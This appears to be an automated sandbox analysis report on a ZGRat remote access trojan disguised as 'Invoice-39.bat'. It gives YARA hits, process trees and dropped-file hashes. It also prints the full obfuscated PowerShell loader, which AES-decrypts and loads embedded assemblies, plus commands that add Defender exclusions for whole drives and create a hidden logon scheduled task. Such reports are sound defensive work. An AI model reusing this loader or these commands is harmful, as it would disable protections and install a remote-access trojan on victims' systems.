zgrat | 273070280cfcced7c88f6edbd876b9de678231d65483c340513173818b899c3c

Analysis

max time kernel
114s
max time network
138s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
09/01/2024, 15:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Invoice-39.bat
Size

1021KB
MD5

c864693dc9a855e50e5eb7cdc91e4cd6
SHA1

9ee54660c8b370012a24acf6c6b12d06a576fdf8
SHA256

273070280cfcced7c88f6edbd876b9de678231d65483c340513173818b899c3c
SHA512

ccf1e7399e05bade690a1ad7bae18fb7626ce86115d68150eef71621d26e547324f4e5df47e196c8ca2ce0f8b5e180394ff86809d50ff594cd7ce187ec8b55d7
SSDEEP

24576:DMnBdFLBix7/0ExvJAoogB6/PPVWB3eSWX7+cgaNzX:gdB2PZpogaM3WEYX

Score

10^/10

zgrat rat

Malware Config

Signatures

Detect ZGRat V1 31 IoCs

resource	yara_rule
behavioral1/memory/4208-527-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-531-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-535-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-541-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-547-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-553-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-555-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-563-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-567-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-565-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-575-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-573-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-579-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-577-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-581-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-571-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-569-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-561-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-559-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-557-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-551-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-549-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-545-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-543-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-539-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-537-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-533-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-529-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-525-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-523-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1
behavioral1/memory/4208-522-0x0000021227480000-0x0000021227560000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	4208	powershell.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
2172	powershell.exe
2172	powershell.exe
2172	powershell.exe
3196	powershell.exe
3196	powershell.exe
3196	powershell.exe
1308	powershell.exe
1308	powershell.exe
1308	powershell.exe
600	powershell.exe
600	powershell.exe
600	powershell.exe
96	powershell.exe
96	powershell.exe
96	powershell.exe
4208	powershell.exe
4208	powershell.exe
4208	powershell.exe
1304	powershell.exe
1304	powershell.exe
1304	powershell.exe
1036	powershell.exe
1036	powershell.exe
1036	powershell.exe
692	powershell.exe
692	powershell.exe
692	powershell.exe
4140	powershell.exe
4140	powershell.exe
4140	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeIncreaseQuotaPrivilege	1308	powershell.exe
Token: SeSecurityPrivilege	1308	powershell.exe
Token: SeTakeOwnershipPrivilege	1308	powershell.exe
Token: SeLoadDriverPrivilege	1308	powershell.exe
Token: SeSystemProfilePrivilege	1308	powershell.exe
Token: SeSystemtimePrivilege	1308	powershell.exe
Token: SeProfSingleProcessPrivilege	1308	powershell.exe
Token: SeIncBasePriorityPrivilege	1308	powershell.exe
Token: SeCreatePagefilePrivilege	1308	powershell.exe
Token: SeBackupPrivilege	1308	powershell.exe
Token: SeRestorePrivilege	1308	powershell.exe
Token: SeShutdownPrivilege	1308	powershell.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeSystemEnvironmentPrivilege	1308	powershell.exe
Token: SeRemoteShutdownPrivilege	1308	powershell.exe
Token: SeUndockPrivilege	1308	powershell.exe
Token: SeManageVolumePrivilege	1308	powershell.exe
Token: 33	1308	powershell.exe
Token: 34	1308	powershell.exe
Token: 35	1308	powershell.exe
Token: 36	1308	powershell.exe
Token: SeDebugPrivilege	600	powershell.exe
Token: SeIncreaseQuotaPrivilege	600	powershell.exe
Token: SeSecurityPrivilege	600	powershell.exe
Token: SeTakeOwnershipPrivilege	600	powershell.exe
Token: SeLoadDriverPrivilege	600	powershell.exe
Token: SeSystemProfilePrivilege	600	powershell.exe
Token: SeSystemtimePrivilege	600	powershell.exe
Token: SeProfSingleProcessPrivilege	600	powershell.exe
Token: SeIncBasePriorityPrivilege	600	powershell.exe
Token: SeCreatePagefilePrivilege	600	powershell.exe
Token: SeBackupPrivilege	600	powershell.exe
Token: SeRestorePrivilege	600	powershell.exe
Token: SeShutdownPrivilege	600	powershell.exe
Token: SeDebugPrivilege	600	powershell.exe
Token: SeSystemEnvironmentPrivilege	600	powershell.exe
Token: SeRemoteShutdownPrivilege	600	powershell.exe
Token: SeUndockPrivilege	600	powershell.exe
Token: SeManageVolumePrivilege	600	powershell.exe
Token: 33	600	powershell.exe
Token: 34	600	powershell.exe
Token: 35	600	powershell.exe
Token: 36	600	powershell.exe
Token: SeDebugPrivilege	96	powershell.exe
Token: SeIncreaseQuotaPrivilege	96	powershell.exe
Token: SeSecurityPrivilege	96	powershell.exe
Token: SeTakeOwnershipPrivilege	96	powershell.exe
Token: SeLoadDriverPrivilege	96	powershell.exe
Token: SeSystemProfilePrivilege	96	powershell.exe
Token: SeSystemtimePrivilege	96	powershell.exe
Token: SeProfSingleProcessPrivilege	96	powershell.exe
Token: SeIncBasePriorityPrivilege	96	powershell.exe
Token: SeCreatePagefilePrivilege	96	powershell.exe
Token: SeBackupPrivilege	96	powershell.exe
Token: SeRestorePrivilege	96	powershell.exe
Token: SeShutdownPrivilege	96	powershell.exe
Token: SeDebugPrivilege	96	powershell.exe
Token: SeSystemEnvironmentPrivilege	96	powershell.exe
Token: SeRemoteShutdownPrivilege	96	powershell.exe
Token: SeUndockPrivilege	96	powershell.exe
Token: SeManageVolumePrivilege	96	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 4068 wrote to memory of 3512	4068	cmd.exe	73
PID 4068 wrote to memory of 3512	4068	cmd.exe	73
PID 3512 wrote to memory of 1964	3512	cmd.exe	75
PID 3512 wrote to memory of 1964	3512	cmd.exe	75
PID 3512 wrote to memory of 2172	3512	cmd.exe	76
PID 3512 wrote to memory of 2172	3512	cmd.exe	76
PID 2172 wrote to memory of 3196	2172	powershell.exe	77
PID 2172 wrote to memory of 3196	2172	powershell.exe	77
PID 2172 wrote to memory of 1308	2172	powershell.exe	79
PID 2172 wrote to memory of 1308	2172	powershell.exe	79
PID 2172 wrote to memory of 600	2172	powershell.exe	82
PID 2172 wrote to memory of 600	2172	powershell.exe	82
PID 2172 wrote to memory of 96	2172	powershell.exe	85
PID 2172 wrote to memory of 96	2172	powershell.exe	85
PID 2172 wrote to memory of 60	2172	powershell.exe	89
PID 2172 wrote to memory of 60	2172	powershell.exe	89
PID 60 wrote to memory of 3716	60	cmd.exe	88
PID 60 wrote to memory of 3716	60	cmd.exe	88
PID 3716 wrote to memory of 3304	3716	cmd.exe	91
PID 3716 wrote to memory of 3304	3716	cmd.exe	91
PID 3716 wrote to memory of 4208	3716	cmd.exe	90
PID 3716 wrote to memory of 4208	3716	cmd.exe	90
PID 4208 wrote to memory of 1304	4208	powershell.exe	92
PID 4208 wrote to memory of 1304	4208	powershell.exe	92
PID 4208 wrote to memory of 1036	4208	powershell.exe	94
PID 4208 wrote to memory of 1036	4208	powershell.exe	94
PID 4208 wrote to memory of 692	4208	powershell.exe	96
PID 4208 wrote to memory of 692	4208	powershell.exe	96
PID 4208 wrote to memory of 4140	4208	powershell.exe	98
PID 4208 wrote to memory of 4140	4208	powershell.exe	98

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Invoice-39.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\Invoice-39.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\Invoice-39.bat';$fxXx='ReaFKwddFKwdLiFKwdnFKwdesFKwd'.Replace('FKwd', ''),'ChNMzCanNMzCgNMzCeNMzCExNMzCtNMzCenNMzCsiNMzConNMzC'.Replace('NMzC', ''),'McjnIacjnIicjnInMocjnIdulcjnIecjnI'.Replace('cjnI', ''),'TrNEGrarNEGnsrNEGforNEGrrNEGmFirNEGnarNEGlrNEGBrNEGlrNEGocrNEGkrNEG'.Replace('rNEG', ''),'DeeDBPcoeDBPmeDBPpreDBPeeDBPseDBPseDBP'.Replace('eDBP', ''),'ICOlinvCOliokeCOli'.Replace('COli', ''),'CreijuaatijuaeDijuaecijuaryijuaptijuaoijuarijua'.Replace('ijua', ''),'EXHKElemXHKEenXHKEtAtXHKE'.Replace('XHKE', ''),'EntSJGMrySJGMPoSJGMinSJGMtSJGM'.Replace('SJGM', ''),'GeiJpQtCiJpQuriJpQriJpQeniJpQtPriJpQoiJpQceiJpQsiJpQsiJpQ'.Replace('iJpQ', ''),'SXVhbplXVhbitXVhb'.Replace('XVhb', ''),'ClDDQopylDDQTolDDQ'.Replace('lDDQ', ''),'FrSeyjomSeyjBaSeyjsSeyje64SeyjSSeyjtrSeyjinSeyjgSeyj'.Replace('Seyj', ''),'LwBmPoadwBmP'.Replace('wBmP', '');powershell -w hidden;function ITsZp($dVchE){$gNXDi=[System.Security.Cryptography.Aes]::Create();$gNXDi.Mode=[System.Security.Cryptography.CipherMode]::CBC;$gNXDi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$gNXDi.Key=[System.Convert]::($fxXx[12])('U0ySKR4Xmtk8cxllxra9qSGbC/DAMeCm92vh7d54w/A=');$gNXDi.IV=[System.Convert]::($fxXx[12])('Q1fmpuietxVkb9L4twm/TQ==');$UjTfr=$gNXDi.($fxXx[6])();$FArSI=$UjTfr.($fxXx[3])($dVchE,0,$dVchE.Length);$UjTfr.Dispose();$gNXDi.Dispose();$FArSI;}function HLgzL($dVchE){$BCUbK=New-Object System.IO.MemoryStream(,$dVchE);$gtoQN=New-Object System.IO.MemoryStream;$Sbprn=New-Object System.IO.Compression.GZipStream($BCUbK,[IO.Compression.CompressionMode]::($fxXx[4]));$Sbprn.($fxXx[11])($gtoQN);$Sbprn.Dispose();$BCUbK.Dispose();$gtoQN.Dispose();$gtoQN.ToArray();}$XgHth=[System.IO.File]::($fxXx[0])([Console]::Title);$KfATP=HLgzL (ITsZp ([Convert]::($fxXx[12])([System.Linq.Enumerable]::($fxXx[7])($XgHth, 5).Substring(2))));$ogMdi=HLgzL (ITsZp ([Convert]::($fxXx[12])([System.Linq.Enumerable]::($fxXx[7])($XgHth, 6).Substring(2))));[System.Reflection.Assembly]::($fxXx[13])([byte[]]$ogMdi).($fxXx[8]).($fxXx[5])($null,$null);[System.Reflection.Assembly]::($fxXx[13])([byte[]]$KfATP).($fxXx[8]).($fxXx[5])($null,$null); "
    3⤵
    PID:1964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\Invoice-39')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 85336' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network85336Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:96
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network85336Man.cmd"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:60

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network85336Man.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:3716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1304
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network85336Man')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 85336' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network85336Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network85336Man.cmd';$fxXx='ReaFKwddFKwdLiFKwdnFKwdesFKwd'.Replace('FKwd', ''),'ChNMzCanNMzCgNMzCeNMzCExNMzCtNMzCenNMzCsiNMzConNMzC'.Replace('NMzC', ''),'McjnIacjnIicjnInMocjnIdulcjnIecjnI'.Replace('cjnI', ''),'TrNEGrarNEGnsrNEGforNEGrrNEGmFirNEGnarNEGlrNEGBrNEGlrNEGocrNEGkrNEG'.Replace('rNEG', ''),'DeeDBPcoeDBPmeDBPpreDBPeeDBPseDBPseDBP'.Replace('eDBP', ''),'ICOlinvCOliokeCOli'.Replace('COli', ''),'CreijuaatijuaeDijuaecijuaryijuaptijuaoijuarijua'.Replace('ijua', ''),'EXHKElemXHKEenXHKEtAtXHKE'.Replace('XHKE', ''),'EntSJGMrySJGMPoSJGMinSJGMtSJGM'.Replace('SJGM', ''),'GeiJpQtCiJpQuriJpQriJpQeniJpQtPriJpQoiJpQceiJpQsiJpQsiJpQ'.Replace('iJpQ', ''),'SXVhbplXVhbitXVhb'.Replace('XVhb', ''),'ClDDQopylDDQTolDDQ'.Replace('lDDQ', ''),'FrSeyjomSeyjBaSeyjsSeyje64SeyjSSeyjtrSeyjinSeyjgSeyj'.Replace('Seyj', ''),'LwBmPoadwBmP'.Replace('wBmP', '');powershell -w hidden;function ITsZp($dVchE){$gNXDi=[System.Security.Cryptography.Aes]::Create();$gNXDi.Mode=[System.Security.Cryptography.CipherMode]::CBC;$gNXDi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$gNXDi.Key=[System.Convert]::($fxXx[12])('U0ySKR4Xmtk8cxllxra9qSGbC/DAMeCm92vh7d54w/A=');$gNXDi.IV=[System.Convert]::($fxXx[12])('Q1fmpuietxVkb9L4twm/TQ==');$UjTfr=$gNXDi.($fxXx[6])();$FArSI=$UjTfr.($fxXx[3])($dVchE,0,$dVchE.Length);$UjTfr.Dispose();$gNXDi.Dispose();$FArSI;}function HLgzL($dVchE){$BCUbK=New-Object System.IO.MemoryStream(,$dVchE);$gtoQN=New-Object System.IO.MemoryStream;$Sbprn=New-Object System.IO.Compression.GZipStream($BCUbK,[IO.Compression.CompressionMode]::($fxXx[4]));$Sbprn.($fxXx[11])($gtoQN);$Sbprn.Dispose();$BCUbK.Dispose();$gtoQN.Dispose();$gtoQN.ToArray();}$XgHth=[System.IO.File]::($fxXx[0])([Console]::Title);$KfATP=HLgzL (ITsZp ([Convert]::($fxXx[12])([System.Linq.Enumerable]::($fxXx[7])($XgHth, 5).Substring(2))));$ogMdi=HLgzL (ITsZp ([Convert]::($fxXx[12])([System.Linq.Enumerable]::($fxXx[7])($XgHth, 6).Substring(2))));[System.Reflection.Assembly]::($fxXx[13])([byte[]]$ogMdi).($fxXx[8]).($fxXx[5])($null,$null);[System.Reflection.Assembly]::($fxXx[13])([byte[]]$KfATP).($fxXx[8]).($fxXx[5])($null,$null); "
  2⤵
  PID:3304

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
b346252fc3402a8f9552de980b4d5bf4

SHA1
e334a503dcf33f5ce0c80a282f1b73ad596d224b

SHA256
1cbdf33258112c4d294618126f4c920436e14a4f1879a00441388bc455556201

SHA512
069aa6baca7d77b5d5086922df095b86cef4abac6290d4e2709b6665968fd73b5b264bfc34f744a608ea0a8f54f7418a07d9f5fbc7b398c00e6ad6119e0d789e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
5d05836181b5635b4f437dc1726031a1

SHA1
b43edf79b29359ef12ac1c22d051b400463ed89d

SHA256
86ecc33bcf4af0325abcf5f17b1b1b1ec6b51e12815b0045cb8c45647aed19dc

SHA512
773c1e6386ac56eb0a8738396eb209dcceb358c5448d4213e595bd5845a428df21ded6c10e606279f02fb0be4329962757f4c2c0bf9912991c22ce425ffee212

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
810a9051e4fd51a88862b8ec1cffbe87

SHA1
9c79a9fa72eaa13c40252fbbfb62ac3a6fb13d06

SHA256
2529a61bf5b0a6abc28690a2d4461c42e9441dc5188516323012774a055382ca

SHA512
4070b4e6c2e826531da74c668f7be7604e72964fe40594bfbbe209578e5efe61ab682736f0634561ee1abf57e19e12fff032561e277be1ce2ab43ada6bc7ae8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fdebe1a683b83abaa47a32d81af88709

SHA1
130925a6add136a5d76b0f1aaf08836a27c0c51d

SHA256
9c3a13899a9e8388861b05de5a99d2f8a6193ec3abf202c4b69b82dd01d13e7d

SHA512
71e38e354800f383f22d87151b0f85d173b8bb2b1b66bd61b9f89157c0686d4db2ba524022dbe353cc2d96db06532e6b9710472cb622310337c3bdfd6bb9bd6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9f74c020148916bf2d8e8402b3e689fe

SHA1
890c18c7322c4a6f4b55318c8232c3e3d384673b

SHA256
959b87ddb16ec38bcc24a832f4a815c52d74f90d2f9dca10bd3496031f38734d

SHA512
2744954a2f18e6284cbb11f05e489704c7b8c576f4eebbf2cc754e08ae0ac20653e1e89a9dfc61cef9dd15e4f484797321699b050ae2725b715303a74fc86428

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ad3803e5f36946e3236d692437d2aa8a

SHA1
5e7a5d22cc71ed936ee491f5a10dea89f44fbd5f

SHA256
7ecbf0ddfb0e73c2c9ba61dee476e9f7d9a608dd84f92ec3d15acd57fe29be8a

SHA512
eec6fea69d7d65f1927941dd6165e1148bd01b1bf52438a2605f20bed47a57ec734bded7da9fe84f89dc2523fb8cf6945dcded11c5f3598b2637c64b2d5818d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
78e925623a22dc063d4bb3ea7fb4e7df

SHA1
8d443a0f228c76c1d80951db8fbf36a84d61eaa4

SHA256
85825a32c37a5cf427c3aca4f167431590860a6b9b2e124a1c7af95d07c4d514

SHA512
bb45de496754b7dff48f9f0d71d6ee6ecf480232d4b22d8967a95594f6585e27744419332cecb5e1dbb69b2993ef0583a1d76b4203f3d771f469059ade46a150

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3suqis32.4ex.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Network85336Man.cmd

Filesize
190KB

MD5
10d94b188b3400542e12c34145d32f07

SHA1
6a4dbc737629f75b965309ed8073c6796ae5fb6a

SHA256
420e35bdfda6c9f54bc433c757dc159ad289cf877bf27a3b86f66fe95eb7b38f

SHA512
fec522a8e40a299e00f1895626f340d8eaa5e66373e3f0473d24b9aff5583331e86043835999951599b6e578f1ceeb6017cf7465f9468aee66ff23b58ce6a507

Download Submit
memory/96-222-0x00000237D69A0000-0x00000237D69B0000-memory.dmp

Filesize
64KB

Download
memory/96-224-0x00000237D69A0000-0x00000237D69B0000-memory.dmp

Filesize
64KB

Download
memory/96-221-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/96-238-0x00000237D69A0000-0x00000237D69B0000-memory.dmp

Filesize
64KB

Download
memory/96-255-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/600-195-0x0000018DF3330000-0x0000018DF3340000-memory.dmp

Filesize
64KB

Download
memory/600-212-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/600-180-0x0000018DF3330000-0x0000018DF3340000-memory.dmp

Filesize
64KB

Download
memory/600-179-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/692-457-0x00000275456C0000-0x00000275456D0000-memory.dmp

Filesize
64KB

Download
memory/692-474-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/692-439-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/692-441-0x00000275456C0000-0x00000275456D0000-memory.dmp

Filesize
64KB

Download
memory/692-440-0x00000275456C0000-0x00000275456D0000-memory.dmp

Filesize
64KB

Download
memory/1036-432-0x0000023592E60000-0x0000023592E70000-memory.dmp

Filesize
64KB

Download
memory/1036-393-0x0000023592E60000-0x0000023592E70000-memory.dmp

Filesize
64KB

Download
memory/1036-392-0x0000023592E60000-0x0000023592E70000-memory.dmp

Filesize
64KB

Download
memory/1036-391-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/1036-409-0x0000023592E60000-0x0000023592E70000-memory.dmp

Filesize
64KB

Download
memory/1036-434-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/1304-321-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/1304-370-0x0000023B98730000-0x0000023B98740000-memory.dmp

Filesize
64KB

Download
memory/1304-371-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/1304-323-0x0000023B98730000-0x0000023B98740000-memory.dmp

Filesize
64KB

Download
memory/1308-133-0x000001BAA2BB0000-0x000001BAA2BC0000-memory.dmp

Filesize
64KB

Download
memory/1308-148-0x000001BAA2BB0000-0x000001BAA2BC0000-memory.dmp

Filesize
64KB

Download
memory/1308-128-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/1308-237-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/1308-130-0x000001BAA2BB0000-0x000001BAA2BC0000-memory.dmp

Filesize
64KB

Download
memory/2172-375-0x00007FF9C3230000-0x00007FF9C32DE000-memory.dmp

Filesize
696KB

Download
memory/2172-116-0x00007FF9C3230000-0x00007FF9C32DE000-memory.dmp

Filesize
696KB

Download
memory/2172-4-0x0000026CABC20000-0x0000026CABC42000-memory.dmp

Filesize
136KB

Download
memory/2172-8-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/2172-171-0x0000026C935D0000-0x0000026C935E0000-memory.dmp

Filesize
64KB

Download
memory/2172-15-0x0000026C935D0000-0x0000026C935E0000-memory.dmp

Filesize
64KB

Download
memory/2172-19-0x0000026C935D0000-0x0000026C935E0000-memory.dmp

Filesize
64KB

Download
memory/2172-147-0x0000026C935D0000-0x0000026C935E0000-memory.dmp

Filesize
64KB

Download
memory/2172-132-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/2172-34-0x0000026CABED0000-0x0000026CABF0C000-memory.dmp

Filesize
240KB

Download
memory/2172-373-0x00007FF9B6D50000-0x00007FF9B773C000-memory.dmp

Filesize
9.9MB

Download
memory/2172-376-0x00007FF9C4870000-0x00007FF9C4A4B000-memory.dmp

Filesize
1.9MB

Download
memory/2172-218-0x00007FF9C4870000-0x00007FF9C4A4B000-memory.dmp

Filesize
1.9MB

Download
memory/2172-45-0x0000026CAC1B0000-0x0000026CAC226000-memory.dmp

Filesize
472KB

Download
memory/2172-216-0x0000026C935D0000-0x0000026C935E0000-memory.dmp

Filesize
64KB

Download
memory/2172-112-0x0000026C935D0000-0x0000026C935E0000-memory.dmp

Filesize
64KB

Download
memory/2172-117-0x0000026CAC4C0000-0x0000026CAC582000-memory.dmp

Filesize
776KB

Download
memory/2172-113-0x0000026CABEC0000-0x0000026CABECA000-memory.dmp

Filesize
40KB

Download
memory/2172-114-0x00007FF9C4870000-0x00007FF9C4A4B000-memory.dmp

Filesize
1.9MB

Download
